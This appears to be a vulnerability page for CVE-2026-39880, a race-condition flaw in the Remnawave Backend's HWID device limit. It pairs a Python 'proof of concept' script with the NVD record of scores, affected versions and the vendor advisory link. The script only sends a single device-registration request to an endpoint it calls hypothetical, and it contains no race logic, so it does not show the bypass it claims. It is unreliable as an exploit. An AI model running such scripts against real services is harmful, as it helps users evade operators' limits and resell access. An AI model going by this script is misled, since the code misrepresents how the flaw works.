CVE-2026-39880

import requests def exploit_hwid_bypass(target_url, auth_token, new_hwid): """ PoC for CVE-2026-39880 Demonstrates bypassing the HWID device registration limit. """ headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json", "User-Agent": "CVE-2026-39880-Scanner" } # Payload for registering a new device payload = { "hwid": new_hwid, "device_name": "Bypassed Device" } # Endpoint for device registration (hypothetical) endpoint = f"{target_url}/api/v1/devices/register" try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Success: Device {new_hwid} registered.") print(f"[+] Response: {response.text}") else: print(f"[-] Failed: HTTP {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Replace with actual target and token exploit_hwid_bypass("https://example.com", "YOUR_TOKEN", "HWID-123456")

{"cve": {"id": "CVE-2026-39880", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:26.850", "lastModified": "2026-04-17T20:38:20.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Remnawave Backend is the backend for the Remnawave proxy and user management solution. Prior to 2.7.5, a glitch in the HWID device registration logic allows an authenticated user to bypass the configured limit for HWID devices and register more devices than expected, allowing them to resell subscriptions and consume excessive traffic. This vulnerability is fixed in 2.7.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:L", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remnawave:remnawave_backend:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.4", "matchCriteriaId": "50EC0CF7-868B-4DE4-8566-D7D9F11258C0"}]}]}], "references": [{"url": "https://github.com/remnawave/backend/security/advisories/GHSA-985p-44h5-v3pq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}